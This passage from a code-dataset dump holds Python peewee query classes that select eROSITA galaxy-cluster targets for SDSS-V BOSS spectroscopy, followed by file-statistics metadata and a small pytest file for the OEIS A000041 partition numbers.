                c2ls.version_id == version_id,
                c2ls.best >> True
            )
            .where(
                s16.c.specobjid.is_null(True),  # all of these must be satisfied
                s2020.c.pk.is_null(True),
                sV.c.specobjid.is_null(True),
                sph.c.pkey.is_null(True),
            )
            .where(
                (
                    (ls.fibertotflux_r.between(fibertotflux_r_min, fibertotflux_r_max)) |
                    (ls.fibertotflux_z.between(fibertotflux_z_min, fibertotflux_z_max))
                ),
                (x.c.target_has_spec == 0),
                # gaia safety checks to avoid bad ls photometry
                ~(ls.gaia_phot_g_mean_mag.between(0.1, self.parameters['gaia_g_mag_limit'])),
                ~(ls.gaia_phot_rp_mean_mag.between(0.1, self.parameters['gaia_rp_mag_limit'])),
            )
        )

        if query_region:
            query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
                                                           query_region[0],
                                                           query_region[1],
                                                           query_region[2]))

        return query
#
# END BhmSpidersClustersLsdr8Carton
# ##################################################################################
class BhmSpidersClustersEfedsStragglersCarton(BaseCarton):
    """SPIDERS eFEDS straggler clusters from the Legacy Survey DR8 cross-match.

    Same selection logic as ``BhmSpidersClustersLsdr8Carton``, applied to the
    eFEDS catalogue version.  All eFEDS plates have already been observed, so
    the plate-holes veto used by the lsdr8 carton is intentionally omitted
    here, and Gaia magnitudes are reported directly from LS DR8 columns.
    """

    name = 'bhm_spiders_clusters_efeds_stragglers'
    category = 'science'
    mapper = 'BHM'
    program = 'bhm_spiders'
    tile = False
    instrument = 'BOSS'
    inertial = True

    def build_query(self, version_id, query_region=None):
        """Return the peewee query selecting this carton's targets.

        Parameters
        ----------
        version_id
            Cross-match plan version id; filters all catalog relational tables.
        query_region
            Optional (ra, dec, radius) sequence restricting targets to a cone.
        """
        c = Catalog.alias()
        ls = Legacy_Survey_DR8.alias()
        c2ls = CatalogToLegacy_Survey_DR8.alias()
        xx = EROSITASupersetClusters.alias()

        # Rank the counterparts of each eROSITA detection by decreasing
        # xmatch_metric; rank 1 is treated as the brightest cluster galaxy.
        x = (
            xx
            .select(
                fn.rank().over(partition_by=[xx.ero_detuid],
                               order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
                xx.ero_detuid.alias('ero_detuid'),
                xx.ls_id.alias('ls_id'),
                xx.target_has_spec.alias('target_has_spec'),
            )
            .where(
                (xx.ero_version == self.parameters['ero_version']),
                (xx.xmatch_method == self.parameters['xmatch_method']),
                (xx.xmatch_version == self.parameters['xmatch_version']),
                (xx.opt_cat == self.parameters['opt_cat']),
                (xx.xmatch_metric > self.parameters['xmatch_metric_min']),
                (xx.ero_det_like > self.parameters['det_like_min']),
            )
            .alias('x')
        )

        instrument = peewee.Value(self.instrument)
        inertial = peewee.Value(self.inertial).cast('bool')

        # Convert parameter-file magnitude limits into fluxes (brighter
        # magnitude -> larger flux, hence the min/max swap).
        fibertotflux_r_max = AB2nMgy(self.parameters['fibertotmag_r_min'])
        fibertotflux_r_min = AB2nMgy(self.parameters['fibertotmag_r_max'])
        fibertotflux_z_max = AB2nMgy(self.parameters['fibertotmag_z_min'])
        fibertotflux_z_min = AB2nMgy(self.parameters['fibertotmag_z_max'])

        fibertotflux_r_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence1'])
        fibertotflux_z_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_z_for_cadence1'])
        fibertotflux_r_min_for_cadence2 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence2'])
        gaia_g_max_for_cadence1 = self.parameters['gaia_g_max_for_cadence1']
        gaia_rp_max_for_cadence1 = self.parameters['gaia_rp_max_for_cadence1']

        # #########################################################################
        # prepare the spectroscopy catalogues
        match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
        spec_sn_thresh = self.parameters['spec_sn_thresh']
        spec_z_err_thresh = self.parameters['spec_z_err_thresh']

        # SDSS DR16 - archival good-quality redshifts
        c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
        ss16 = SDSS_DR16_SpecObj.alias()
        s16 = (
            ss16.select(
                ss16.specobjid.alias('specobjid'),
            )
            .where(
                ss16.snmedian >= spec_sn_thresh,
                ss16.zwarning == 0,
                ss16.zerr <= spec_z_err_thresh,
                ss16.zerr > 0.0,
                ss16.scienceprimary > 0,
            )
            .alias('s16')
        )

        # SDSS-IV/eFEDS March2020
        c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
        ss2020 = BHM_eFEDS_Veto.alias()
        s2020 = (
            ss2020.select(
                ss2020.pk.alias('pk'),
            )
            .where(
                ss2020.sn_median_all >= spec_sn_thresh,
                ss2020.zwarning == 0,
                ss2020.z_err <= spec_z_err_thresh,
                ss2020.z_err > 0.0,
            )
            .alias('s2020')
        )

        # SDSS-V spAll
        ssV = SDSSV_BOSS_SPALL.alias()
        sV = (
            ssV.select(
                ssV.specobjid.alias('specobjid'),
                ssV.plug_ra.alias('plug_ra'),
                ssV.plug_dec.alias('plug_dec'),
            )
            .where(
                ssV.sn_median_all >= spec_sn_thresh,
                ssV.zwarning == 0,
                ssV.z_err <= spec_z_err_thresh,
                ssV.z_err > 0.0,
                ssV.specprimary > 0,
            )
            .alias('sV')
        )

        # All eFEDS plates have been observed so ignore plateholes now
        # (no `sph` subquery/join/veto in this carton, unlike lsdr8).

        # priority is determined by target rank within cluster:
        # the BCG (rank 1) gets the carton's floor priority; members are
        # demoted per rank, capped at priority_levels - 2 extra steps.
        priority = peewee.Case(
            None,
            (
                (
                    x.c.x_rank == 1,
                    self.parameters['priority_floor_bcg']
                ),
                (
                    x.c.x_rank > 1,
                    self.parameters['priority_floor_member'] +
                    fn.least(self.parameters['priority_levels'] - 2,
                             x.c.x_rank - 2)
                ),
            ),
            None)

        value = peewee.Case(
            None,
            (
                (x.c.x_rank == 1, self.parameters['value_bcg']),
                (x.c.x_rank > 1, self.parameters['value_member']),
            ),
            None).cast('float')

        # choose cadence based on fiber magnitude in r-band (with Gaia
        # magnitudes as an additional bright-end trigger for cadence1)
        cadence1 = self.parameters['cadence1']
        cadence2 = self.parameters['cadence2']
        cadence3 = self.parameters['cadence3']
        cadence4 = 'unknown_cadence'  # catch failures
        cadence = peewee.Case(
            None,
            (
                (
                    ((ls.fibertotflux_r > fibertotflux_r_min_for_cadence1) |
                     (ls.fibertotflux_z > fibertotflux_z_min_for_cadence1) |
                     (ls.gaia_phot_g_mean_mag.between(0.1, gaia_g_max_for_cadence1)) |
                     (ls.gaia_phot_rp_mean_mag.between(0.1, gaia_rp_max_for_cadence1))),
                    cadence1),
                (ls.fibertotflux_r > fibertotflux_r_min_for_cadence2, cadence2),
                (ls.fibertotflux_r <= fibertotflux_r_min_for_cadence2, cadence3),
            ),
            cadence4)

        # compute transformed SDSS mags for pointlike and extended sources separately
        # transform the legacysurvey grz into sdss psfmag griz
        # copy of routine for bhm_spiders_clusters_lsdr8
        coeffs = {
            "g2_e": -0.897719,
            "g1_e": 2.298300,
            "g0_e": -1.019299,
            "i2_e": -0.950114,
            "i1_e": 0.981972,
            "i0_e": -0.261645,
            "r2_e": -0.201741,
            "r1_e": 0.697128,
            "r0_e": -0.120926,
            "z2_e": -1.424312,
            "z1_e": 2.415301,
            "z0_e": -0.677163,
        }

        nMgy_min = 1e-3  # equiv to AB=30
        # extended - start from ls8 fiberfluxes
        g0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g)))
        r0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
        z0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
        g_r_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g) /
                                      peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
        r_z_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r) /
                                      peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))

        # polynomial colour-term transformation to SDSS fiber2mag
        g_e = (g0_e + coeffs['g0_e'] + coeffs['g1_e'] * g_r_e + coeffs['g2_e'] * g_r_e * g_r_e)
        r_e = (r0_e + coeffs['r0_e'] + coeffs['r1_e'] * g_r_e + coeffs['r2_e'] * g_r_e * g_r_e)
        i_e = (r0_e + coeffs['i0_e'] + coeffs['i1_e'] * r_z_e + coeffs['i2_e'] * r_z_e * r_z_e)
        z_e = (z0_e + coeffs['z0_e'] + coeffs['z1_e'] * r_z_e + coeffs['z2_e'] * r_z_e * r_z_e)

        # validity checks - transformed mags are only reported when all three
        # input fibermags are in a sane range
        valid = (g0_e.between(0.1, 29.9) &
                 r0_e.between(0.1, 29.9) &
                 z0_e.between(0.1, 29.9))

        opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_lsdr8'),), 'undefined')
        magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
        magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
        magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
        magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')

        query = (
            c.select(
                c.catalogid.alias('catalogid'),
                ls.ls_id.alias('ls_id'),  # extra
                x.c.ero_detuid.cast('text').alias('ero_detuid'),  # extra
                c.ra.alias('ra'),  # extra
                c.dec.alias('dec'),  # extra
                priority.alias('priority'),
                value.alias('value'),
                cadence.alias('cadence'),
                instrument.alias('instrument'),
                opt_prov.alias('optical_prov'),
                magnitude_g.alias('g'),
                magnitude_r.alias('r'),
                magnitude_i.alias('i'),
                magnitude_z.alias('z'),
                ls.gaia_phot_g_mean_mag.alias('gaia_g'),
                ls.gaia_phot_bp_mean_mag.alias('bp'),
                ls.gaia_phot_rp_mean_mag.alias('rp'),
                inertial.alias('inertial'),
                g0_e.alias('ls8_fibermag_g'),  # extra
                r0_e.alias('ls8_fibermag_r'),  # extra
                z0_e.alias('ls8_fibermag_z'),  # extra
            )
            .join(c2ls)
            .join(ls)
            .join(x, on=(ls.ls_id == x.c.ls_id))
            # start joining the spectroscopy
            .switch(c)
            .join(c2s16, JOIN.LEFT_OUTER)
            .join(
                s16, JOIN.LEFT_OUTER,
                on=(
                    (c2s16.target_id == s16.c.specobjid) &
                    (c2s16.version_id == version_id)
                )
            )
            .switch(c)
            .join(c2s2020, JOIN.LEFT_OUTER)
            .join(
                s2020, JOIN.LEFT_OUTER,
                on=(
                    (c2s2020.target_id == s2020.c.pk) &
                    (c2s2020.version_id == version_id)
                )
            )
            .join(
                sV, JOIN.LEFT_OUTER,
                on=(
                    fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
                                c.ra, c.dec,
                                match_radius_spectro)
                )
            )
            # finished joining the spectroscopy
            .where(
                c.version_id == version_id,
                c2ls.version_id == version_id,
                c2ls.best >> True
            )
            .where(
                s16.c.specobjid.is_null(True),  # all of these must be satisfied
                s2020.c.pk.is_null(True),
                sV.c.specobjid.is_null(True),
            )
            .where(
                (
                    (ls.fibertotflux_r.between(fibertotflux_r_min, fibertotflux_r_max)) |
                    (ls.fibertotflux_z.between(fibertotflux_z_min, fibertotflux_z_max))
                ),
                (x.c.target_has_spec == 0),
                # gaia safety checks to avoid bad ls photometry
                ~(ls.gaia_phot_g_mean_mag.between(0.1, self.parameters['gaia_g_mag_limit'])),
                ~(ls.gaia_phot_rp_mean_mag.between(0.1, self.parameters['gaia_rp_mag_limit'])),
            )
        )

        if query_region:
            query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
                                                           query_region[0],
                                                           query_region[1],
                                                           query_region[2]))

        return query
#
# END BhmSpidersClustersEfedsStragglersCarton
# ##################################################################################
class BhmSpidersClustersPs1dr2Carton(BaseCarton):
    # Carton selecting optical counterparts (from PanSTARRS1-DR2) to
    # eROSITA galaxy-cluster candidates for BOSS spectroscopy, excluding
    # targets that already have an adequate spectrum in any of the
    # veto catalogues joined below (SDSS DR16, eFEDS March2020, SDSS-V
    # spAll, SDSS-V plateholes).
    name = 'bhm_spiders_clusters_ps1dr2'
    category = 'science'
    mapper = 'BHM'
    program = 'bhm_spiders'
    tile = False
    instrument = 'BOSS'
    inertial = True

    def build_query(self, version_id, query_region=None):
        """Build and return the peewee query selecting targets for this carton.

        Parameters
        ----------
        version_id
            Cross-match run version id; pins every catalogue join and the
            ``best`` relational flags to a single cross-match version.
        query_region
            Optional ``(ra, dec, radius)`` sequence (degrees); when given, the
            query is restricted to that cone via ``q3c_radial_query``.

        Returns
        -------
        peewee query yielding one row per distinct PS1-DR2 counterpart, with
        priority/value/cadence and transformed SDSS-like magnitudes.
        """
        c = Catalog.alias()
        ps = Panstarrs1.alias()
        c2ps = CatalogToPanstarrs1.alias()  # only exists after v0.5 cross-match
        # s2020 = BHM_eFEDS_Veto.alias()
        # sV = SDSSV_BOSS_SPALL.alias()
        xx = EROSITASupersetClusters.alias()
        # Sub-query 'x': rank counterparts within each eROSITA detection by
        # decreasing xmatch_metric; x_rank == 1 is the best match (treated as
        # the BCG candidate in the priority/value Cases below).
        x = (
            xx
            .select(
                fn.rank().over(partition_by=[xx.ero_detuid],
                               order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
                xx.ero_detuid.alias('ero_detuid'),
                xx.ps1_dr2_id.alias('ps1_dr2_id'),
                xx.target_has_spec.alias('target_has_spec'),
            )
            .where(
                (xx.ero_version == self.parameters['ero_version']),
                (xx.xmatch_method == self.parameters['xmatch_method']),
                (xx.xmatch_version == self.parameters['xmatch_version']),
                (xx.opt_cat == self.parameters['opt_cat']),
                (xx.xmatch_metric > self.parameters['xmatch_metric_min']),
                (xx.ero_det_like > self.parameters['det_like_min']),
            )
            .alias('x')
        )
        instrument = peewee.Value(self.instrument)
        inertial = peewee.Value(self.inertial).cast('bool')
        # Magnitude limits are converted to flux limits via AB2Jy; note the
        # deliberate min<->max swap: a *minimum* magnitude corresponds to a
        # *maximum* flux (and vice versa) because the scales run oppositely.
        r_psf_flux_max = AB2Jy(self.parameters['r_psf_mag_min'])
        i_psf_flux_max = AB2Jy(self.parameters['i_psf_mag_min'])
        z_psf_flux_max = AB2Jy(self.parameters['z_psf_mag_min'])
        r_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['r_psf_mag_max_for_cadence1'])
        i_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['i_psf_mag_max_for_cadence1'])
        z_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['z_psf_mag_max_for_cadence1'])
        r_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['r_psf_mag_max_for_cadence2'])
        i_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['i_psf_mag_max_for_cadence2'])
        z_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['z_psf_mag_max_for_cadence2'])
        # match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
        # #########################################################################
        # prepare the spectroscopy catalogues
        # spec_join_radius is in arcsec; q3c_join wants degrees.
        match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
        spec_sn_thresh = self.parameters['spec_sn_thresh']
        spec_z_err_thresh = self.parameters['spec_z_err_thresh']
        # SDSS DR16 — keep only 'good' primary spectra (S/N, zwarning, z_err cuts).
        c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
        ss16 = SDSS_DR16_SpecObj.alias()
        s16 = (
            ss16.select(
                ss16.specobjid.alias('specobjid'),
            )
            .where(
                ss16.snmedian >= spec_sn_thresh,
                ss16.zwarning == 0,
                ss16.zerr <= spec_z_err_thresh,
                ss16.zerr > 0.0,
                ss16.scienceprimary > 0,
            )
            .alias('s16')
        )
        # SDSS-IV/eFEDS March2020 — same style of quality cuts as DR16 above.
        c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
        ss2020 = BHM_eFEDS_Veto.alias()
        s2020 = (
            ss2020.select(
                ss2020.pk.alias('pk'),
            )
            .where(
                ss2020.sn_median_all >= spec_sn_thresh,
                ss2020.zwarning == 0,
                ss2020.z_err <= spec_z_err_thresh,
                ss2020.z_err > 0.0,
            )
            .alias('s2020')
        )
        # SDSS-V spAll — plug coordinates retained for the positional q3c join.
        ssV = SDSSV_BOSS_SPALL.alias()
        sV = (
            ssV.select(
                ssV.specobjid.alias('specobjid'),
                ssV.plug_ra.alias('plug_ra'),
                ssV.plug_dec.alias('plug_dec'),
            )
            .where(
                ssV.sn_median_all >= spec_sn_thresh,
                ssV.zwarning == 0,
                ssV.z_err <= spec_z_err_thresh,
                ssV.z_err > 0.0,
                ssV.specprimary > 0,
            )
            .alias('sV')
        )
        # SDSS-V plateholes - only consider plateholes that
        # were drilled+shipped but that were not yet observed
        # (ssconf.plate is NULL after the LEFT OUTER join => not yet observed).
        ssph = SDSSV_Plateholes.alias()
        ssphm = SDSSV_Plateholes_Meta.alias()
        ssconf = SDSSV_BOSS_Conflist.alias()
        sph = (
            ssph.select(
                ssph.pkey.alias('pkey'),
                ssph.target_ra.alias('target_ra'),
                ssph.target_dec.alias('target_dec'),
            )
            .join(
                ssphm,
                on=(ssph.yanny_uid == ssphm.yanny_uid)
            )
            .join(
                ssconf, JOIN.LEFT_OUTER,
                on=(ssphm.plateid == ssconf.plate)
            )
            .where(
                (ssph.holetype == 'BOSS_SHARED'),
                (ssph.sourcetype == 'SCI') | (ssph.sourcetype == 'STA'),
                ssphm.isvalid > 0,
                ssconf.plate.is_null(),
            )
            .alias('sph')
        )
        # priority is determined by target rank within cluster
        # start with a priority floor value (per carton)
        # then increment if any conditions are met:
        # (rank 1 -> BCG floor; rank >= 2 -> member floor plus a capped
        #  per-rank offset, clamped to priority_levels - 2)
        priority = peewee.Case(
            None,
            (
                (
                    x.c.x_rank == 1,
                    self.parameters['priority_floor_bcg']
                ),
                (
                    x.c.x_rank > 1,
                    self.parameters['priority_floor_member'] +
                    fn.least(self.parameters['priority_levels'] - 2,
                             x.c.x_rank - 2)
                ),
            ),
            None)
        value = peewee.Case(
            None,
            (
                (x.c.x_rank == 1, self.parameters['value_bcg']),
                (x.c.x_rank > 1, self.parameters['value_member']),
            ),
            None)
        # choose cadence based on psf_flux magnitude in panstarrs1 g,r,i-bands
        # (brightest sources -> cadence1; intermediate -> cadence2; faintest
        #  -> cadence3; anything unmatched falls through to cadence4 sentinel)
        cadence1 = self.parameters['cadence1']
        cadence2 = self.parameters['cadence2']
        cadence3 = self.parameters['cadence3']
        cadence4 = 'unknown_cadence'
        cadence = peewee.Case(
            None,
            (
                ((ps.r_stk_psf_flux > r_psf_flux_min_for_cadence1) |
                 (ps.i_stk_psf_flux > i_psf_flux_min_for_cadence1) |
                 (ps.z_stk_psf_flux > z_psf_flux_min_for_cadence1), cadence1),
                ((ps.r_stk_psf_flux > r_psf_flux_min_for_cadence2) |
                 (ps.i_stk_psf_flux > i_psf_flux_min_for_cadence2) |
                 (ps.z_stk_psf_flux > z_psf_flux_min_for_cadence2), cadence2),
                ((ps.r_stk_psf_flux <= r_psf_flux_min_for_cadence2) &
                 (ps.i_stk_psf_flux <= i_psf_flux_min_for_cadence2) &
                 (ps.z_stk_psf_flux <= z_psf_flux_min_for_cadence2), cadence3),
            ),
            cadence4)
        # compute transformed SDSS mags for all sources uniformly
        # transform the panstarrs1-dr2 griz into sdss psfmag griz
        # extract coeffs from fit logs via:
        # awk 'BEGIN {print("coeffs = {")} /POLYFIT/{ if($3~/sdss_psfmag/){pe="p"} else if ($3~/sdss_fiber2mag/){pe="e"} else{pe="error"}; printf("\"%s%d_%s\": %s,\n", substr($3,length($3)), $8, pe, $10)} END {print("}")}' bhm_spiders_clusters_ps1dr2/ps1dr2_stk_psf_to_sdss_fiber2mag_?_results.log # noqa
        coeffs = {
            "g2_e": -0.353294,
            "g1_e": 0.699658,
            "g0_e": 0.581569,
            "i2_e": -0.446208,
            "i1_e": 0.776628,
            "i0_e": 0.421538,
            "r2_e": -0.123243,
            "r1_e": 0.401786,
            "r0_e": 0.422531,
            "z2_e": -0.488437,
            "z1_e": 0.595132,
            "z0_e": 0.439771,
        }
        # Flux floor so log() never sees zero/negative flux; mag 30 acts as
        # the "no detection" sentinel (clamped mags fail the validity window).
        Jy_min = AB2Jy(30.00)
        # start from ps1dr2 stk psf fluxes (AB mag = 8.9 - 2.5*log10(flux/Jy))
        g0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.g_stk_psf_flux)))
        r0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.r_stk_psf_flux)))
        i0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.i_stk_psf_flux)))
        z0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.z_stk_psf_flux)))
        g_r = g0 - r0
        r_i = r0 - i0
        i_z = i0 - z0
        # use single set of transform coeffs (quadratic in one colour per band)
        g_e = (g0 + coeffs['g0_e'] + coeffs['g1_e'] * g_r + coeffs['g2_e'] * g_r * g_r)
        r_e = (r0 + coeffs['r0_e'] + coeffs['r1_e'] * g_r + coeffs['r2_e'] * g_r * g_r)
        i_e = (i0 + coeffs['i0_e'] + coeffs['i1_e'] * r_i + coeffs['i2_e'] * r_i * r_i)
        z_e = (z0 + coeffs['z0_e'] + coeffs['z1_e'] * i_z + coeffs['z2_e'] * i_z * i_z)
        # validity checks - transformed mags are reported only when all four
        # raw mags are in a physically sensible window
        valid = (g0.between(0.1, 29.9) &
                 r0.between(0.1, 29.9) &
                 i0.between(0.1, 29.9) &
                 z0.between(0.1, 29.9))
        opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_ps1dr2'),), 'undefined')
        magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
        magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
        magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
        magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')
        # # We want to switch between psfmags and fibertotmags depending on
        # # ps.flags EXT+EXT_ALT (i.e. extended sources)
        # # For non-extended targets, we use psfmags, but for extended sources use apermag
        # flux30 = AB2Jy(30.00)
        # ps1_ext_flags = 8388608 + 16777216
        # ps1_good_stack_flag = 134217728
        # opt_prov = peewee.Case(
        #     ps.flags.bin_and(ps1_ext_flags),
        #     ((0, 'ps_psfmag'),),
        #     'ps_apermag')
        #
        # magnitude_g = peewee.Case(
        #     ps.flags.bin_and(ps1_ext_flags),
        #     ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.g_stk_psf_flux))).cast('float')),),
        #     (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.g_stk_aper_flux))).cast('float'))
        #
        # magnitude_r = peewee.Case(
        #     ps.flags.bin_and(ps1_ext_flags),
        #     ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.r_stk_psf_flux))).cast('float')),),
        #     (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.r_stk_aper_flux))).cast('float'))
        #
        # magnitude_i = peewee.Case(
        #     ps.flags.bin_and(ps1_ext_flags),
        #     ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.i_stk_psf_flux))).cast('float')),),
        #     (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.i_stk_aper_flux))).cast('float'))
        #
        # magnitude_z = peewee.Case(
        #     ps.flags.bin_and(ps1_ext_flags),
        #     ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.z_stk_psf_flux))).cast('float')),),
        #     (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.z_stk_aper_flux))).cast('float'))
        # these control matching to spectroscopy
        # NOTE(review): the next three assignments repeat identical
        # definitions made earlier in this method; redundant but harmless.
        match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
        spec_sn_thresh = self.parameters['spec_sn_thresh']
        spec_z_err_thresh = self.parameters['spec_z_err_thresh']
        # this controls use of bad panstarrs photometry
        # 134217728 == 2**27 — presumably the PS1 'good stack' bitmask bit;
        # TODO confirm against the PS1 flag definitions.
        ps1_good_stack_flag = 134217728
        query = (
            c.select(
                c.catalogid.alias('catalogid'),
                ps.catid_objid.alias('ps1_catid_objid'),  # extra
                x.c.ero_detuid.cast('text').alias('ero_detuid'),  # extra
                c.ra.alias('ra'),  # extra
                c.dec.alias('dec'),  # extra
                priority.alias('priority'),
                value.cast('float').alias('value'),
                cadence.alias('cadence'),
                instrument.alias('instrument'),
                opt_prov.alias('optical_prov'),
                magnitude_g.alias('g'),
                magnitude_r.alias('r'),
                magnitude_i.alias('i'),
                magnitude_z.alias('z'),
                (ps.flags.bin_and(ps1_good_stack_flag) > 0)
                .cast('bool').alias('ps1_good_stack_flag'),  # extra
                inertial.alias('inertial'),
            )
            .join(c2ps)
            .join(ps)
            .join(x, on=(ps.catid_objid == x.c.ps1_dr2_id))
            # start joining the spectroscopy
            .switch(c)
            .join(c2s16, JOIN.LEFT_OUTER)
            .join(
                s16, JOIN.LEFT_OUTER,
                on=(
                    (c2s16.target_id == s16.c.specobjid) &
                    (c2s16.version_id == version_id)
                )
            )
            .switch(c)
            .join(c2s2020, JOIN.LEFT_OUTER)
            .join(
                s2020, JOIN.LEFT_OUTER,
                on=(
                    (c2s2020.target_id == s2020.c.pk) &
                    (c2s2020.version_id == version_id)
                )
            )
            .join(
                sV, JOIN.LEFT_OUTER,
                on=(
                    fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
                                c.ra, c.dec,
                                match_radius_spectro)
                )
            )
            .join(
                sph, JOIN.LEFT_OUTER,
                on=(
                    fn.q3c_join(sph.c.target_ra, sph.c.target_dec,
                                c.ra, c.dec,
                                match_radius_spectro)
                )
            )
            # finished joining the spectroscopy
            .where(
                c.version_id == version_id,
                c2ps.version_id == version_id,
                c2ps.best >> True
            )
            # veto: every LEFT-joined spectroscopy source must have found
            # no match for the target to survive
            .where(
                s16.c.specobjid.is_null(True),  # all of these must be satisfied
                s2020.c.pk.is_null(True),
                sV.c.specobjid.is_null(True),
                sph.c.pkey.is_null(True),
            )
            .where(
                (x.c.target_has_spec == 0),
                (ps.r_stk_psf_flux < r_psf_flux_max),
                (ps.i_stk_psf_flux < i_psf_flux_max),
                (ps.z_stk_psf_flux < z_psf_flux_max),
                (ps.r_stk_psf_flux != 'NaN'),  # TODO check this is correct test via peewee
                (ps.i_stk_psf_flux != 'NaN'),
                (ps.z_stk_psf_flux != 'NaN'),
                # TODO - check panstarrs photometry quality ??
                # (ps.flags.bin_and(ps1_good_stack_flag) > 0),
                # TODO gaia safety checks to avoid bad ls photometry???
            )
            .order_by(x.c.ps1_dr2_id, x.c.x_rank.asc())
            .distinct([x.c.ps1_dr2_id, ])  # avoid duplicate entries
        )
        if query_region:
            query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
                                                           query_region[0],
                                                           query_region[1],
                                                           query_region[2]))
        return query
#
# END BhmSpidersClustersPs1dr2Carton
# ##################################################################################
| 39.761194
| 306
| 0.505693
| 5,471
| 47,952
| 4.158289
| 0.085176
| 0.056
| 0.016615
| 0.009495
| 0.896044
| 0.874198
| 0.847253
| 0.838418
| 0.813275
| 0.803692
| 0
| 0.05096
| 0.352603
| 47,952
| 1,205
| 307
| 39.794191
| 0.681871
| 0.205414
| 0
| 0.744681
| 0
| 0
| 0.076758
| 0.017205
| 0
| 0
| 0
| 0.00083
| 0
| 1
| 0.003546
| false
| 0
| 0.010638
| 0
| 0.046099
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
824ed28817701d4f456ca175ae87db76aadc007d
| 114
|
py
|
Python
|
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
from oeis import A000041
def test_partitions():
    """A000041(0, 10) must yield the partition numbers p(0) through p(9)."""
    expected = [1, 1, 2, 3, 5, 7, 11, 15, 22, 30]
    assert A000041(0, 10) == expected
| 19
| 63
| 0.605263
| 21
| 114
| 3.238095
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.329545
| 0.22807
| 114
| 5
| 64
| 22.8
| 0.443182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8263a558c4bffa6bc492c9fc4c61ec578567fafd
| 4,960
|
py
|
Python
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 4
|
2021-03-12T10:40:47.000Z
|
2022-01-11T10:56:53.000Z
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 181
|
